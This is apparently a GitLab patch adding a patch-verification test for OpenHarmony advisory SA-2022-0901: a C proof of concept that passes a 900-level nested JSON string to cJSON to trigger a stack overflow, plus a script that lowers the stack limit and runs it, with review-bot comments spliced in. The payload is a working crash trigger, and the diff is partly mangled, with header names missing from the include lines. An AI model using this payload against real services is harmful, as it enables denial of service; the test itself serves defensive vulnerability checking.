From 7331954897b4ba4fa88062595ac586425554f1a5 Mon Sep 17 00:00:00 2001
From: jingyu123412 <1565704822@qq.com>
Date: Thu, 2 Mar 2023 09:52:14 +0800
Subject: [PATCH] =?UTF-8?q?=E6=8F=90=E4=BA=A4OpenHarmony-SA-2022-0901?=
 =?UTF-8?q?=E5=8A=A8=E6=80=81=E6=B5=8B=E8=AF=95=E7=94=A8=E4=BE=8B?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit

Signed-off-by: jingyu123412 <1565704822@qq.com>
---
 .../2022-09/OpenHarmony-SA-2022-0901/poc.c | 38 +++++++++++++++++++
 .../2022-09/OpenHarmony-SA-2022-0901/poc.sh | 26 +++++++++++++
 2 files changed, 64 insertions(+)
 create mode 100644 demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c
 create mode 100644 demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh

diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c
new file mode 100644
index 000000000..442138216
--- /dev/null
+++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.c
@@ -0,0 +1,38 @@ +/* + * Copyright (c) 2023 Huawei Device Co., Ltd. + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +// 编译时需要使用-l参数链接cjson共享库 +#include +#include + +int main() +{ + + // 准备一个具有900层嵌套结构的json数据 + char *json_string = "{\"a\":[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]}"; + + cJSON *root = cJSON_Parse(json_string); // cJSON_Parse方法解析json数据 + if (root == NULL) + { + // 解析json数据返回值为null,说明设置了最大嵌套层数,修复了漏洞 + printf("OpenHarmony-SA-2022-0901 : not vulnerable\n"); + return 1; + } + // 返回值不为null,没有修复漏洞,应该收到signal 11段错误提示 + printf("OpenHarmony-SA-2022-0901 : vulnerable\n"); + cJSON_Delete(root); + + return 0; +} diff --git a/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh new file mode 100644 index 000000000..a2b1eff38 --- /dev/null +++ b/demo/sectest/poc_patch_scan/2022-09/OpenHarmony-SA-2022-0901/poc.sh 
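Review bot: The two `#include` lines at the top of poc.c are empty as rendered here, so the file as shown cannot compile; the header names (presumably `<stdio.h>` and the cJSON header the preceding comment refers to) look like they were lost in rendering and should be confirmed in the committed file. The result contract of main is only implicit: the comments say an unpatched library is expected to die with signal 11 before the `vulnerable` print runs, so a harness must classify on the signal rather than the exit status, and the patched case exiting 1 reads as a failure to anything keying on status alone — a header comment such as `/* verdict: SIGSEGV = vulnerable; "not vulnerable" + exit 1 = nesting limit enforced; exit 0 = parse survived */` would make that explicit. Minor: `int main()` should be `int main(void)`, and `json_string` points at a string literal and should be declared `const char *json_string`.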
@@ -0,0 +1,26 @@
+#!/bin/bash
+# Copyright (C) 2023 Huawei Device Co., Ltd.
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+
+#//OpenHarmony标准系统中cJSON库解析900层的嵌套json数据大概会占用60KB栈空间
+#修改栈的存储上限,模拟栈资源紧缺的情况,便于触发栈溢出
+#或者也可以继续增加嵌套的层数,使栈溢出,每增加一层会多占用64B的栈空间
+ulimit -s 60
+
+#设置LD_LIBARAY_PATH环境变量,指向cJSON的共享库文件存储位置
+export LD_LIBRARY_PATH=/data/local/tmp
+
+#运行poc可执行程序
+./poc
-- 
GitLab
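Review bot: The script runs `./poc` without checking that the binary is present in the working directory or that `ulimit -s 60` succeeded, and since the comments say the reduced stack is what makes the overflow observable, a silently failed ulimit would presumably let the run complete without the crash the test is looking for; guard both with `ulimit -s 60 || exit 2` and `[ -x ./poc ] || { echo "poc binary missing" >&2; exit 2; }`. The comment above the export spells the variable `LD_LIBARAY_PATH` while the code sets `LD_LIBRARY_PATH`; correct the comment so it matches. Because the loader is pointed at `/data/local/tmp`, the verdict depends entirely on which cJSON build is staged there, so a comment stating that the tester must stage the library under test in that directory before running (and that a shared writable staging path is only appropriate for a lab run) would help the next reader. An English rendering of the Chinese comments would also help reviewers outside the team.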